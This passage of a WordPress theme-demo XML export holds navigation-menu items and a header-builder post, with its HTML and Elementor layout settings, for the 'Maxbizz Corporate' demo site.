		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>14</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1769/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1769/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1769</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1769]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>16</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[858]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-services-1/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/our-services-1/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1770</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>4</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1704]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[868]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/1771/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/1771/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1771</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1771]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>15</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog List</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/blog-list/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/blog-list/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1772</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-list]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>27</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1758]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog Post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/blog-post/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/blog-post/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1773</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-post]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>28</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1758]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[430]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Details</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-details/</link>
		<pubDate>Mon, 09 Nov 2020 04:44:28 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/2020/11/09/portfolio-details/</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1774</wp:post_id>
		<wp:post_date><![CDATA[2020-11-09 04:44:28]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-09 04:44:28]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-details]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>18</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[837]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[ot_portfolio]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/2214/</link>
		<pubDate>Wed, 09 Dec 2020 09:13:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-corporate/?p=2214</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2214</wp:post_id>
		<wp:post_date><![CDATA[2020-12-09 09:13:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-09 09:13:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2214]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>1</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-1/</link>
		<pubDate>Fri, 17 Jul 2020 08:34:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=7</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="Maxbizz">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
			<a href="#" role="button">
						FREE QUOTE
					</a>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-361"><a href="http://wpdemo.archiwp.com/maxbizz/">Home</a></li>
<li id="menu-item-363"><a href="#">Pages</a>
<ul>
	<li id="menu-item-759"><a href="http://wpdemo.archiwp.com/maxbizz/about-us/">About Us</a></li>
	<li id="menu-item-1043"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Our Services 1</a></li>
	<li id="menu-item-1021"><a href="http://wpdemo.archiwp.com/maxbizz/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-764"><a href="http://wpdemo.archiwp.com/maxbizz/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-765"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/">Our Team</a></li>
	<li id="menu-item-766"><a href="http://wpdemo.archiwp.com/maxbizz/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-762"><a href="http://wpdemo.archiwp.com/maxbizz/elements/">Elements</a></li>
	<li id="menu-item-767"><a href="http://wpdemo.archiwp.com/maxbizz/typography/">Typography</a></li>
	<li id="menu-item-763"><a href="http://wpdemo.archiwp.com/maxbizz/faqs/">FAQs</a></li>
	<li id="menu-item-758"><a href="http://wpdemo.archiwp.com/maxbizz/404-2/">404</a></li>
	<li id="menu-item-760"><a href="http://wpdemo.archiwp.com/maxbizz/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1041"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1044"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1042"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1040"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1149"><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1022"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/">Services</a>
<ul>
	<li id="menu-item-1020"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1019"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1018"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1017"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1016"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1015"><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-771"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog</a>
<ul>
	<li id="menu-item-1045"><a href="http://wpdemo.archiwp.com/maxbizz/blog/">Blog List</a></li>
	<li id="menu-item-1068"><a href="http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-761"><a href="http://wpdemo.archiwp.com/maxbizz/contacts/">Contacts</a></li>
</ul>			</nav>
				<a href="http://wpdemo.archiwp.com/maxbizz/cart/" title="View your shopping cart"> 0
				</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>7</wp:post_id>
		<wp:post_date><![CDATA[2020-07-17 08:34:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-17 08:34:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8d39a3f","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"13","right":"0","bottom":"13","left":"0","isLinked":false}},"elements":[{"id":"88d13f7","elType":"column","settings":{"_column_size":50,"_inline_size":25},"elements":[{"id":"fd8c778","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"f0b1296","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"bbce169","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"dfefc95","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":3,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#5F5F5F","title_typography_font_family":"Open Sans","description_color":"#1B1D21","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false},"title_typography_line_height":{"unit":"em","size":1.399999999999999911182158029987476766109466552734375,"sizes":[]}},"elements":[],"widgetType":"icon-box"},{"id":"481a8d7","elType":"widget","settings":{"text":"FREE QUOTE","typography_typography":"custom","typography_font_weight":"600","button_text_color":"#1B1D21","background_color":"rgba(255, 143, 62, 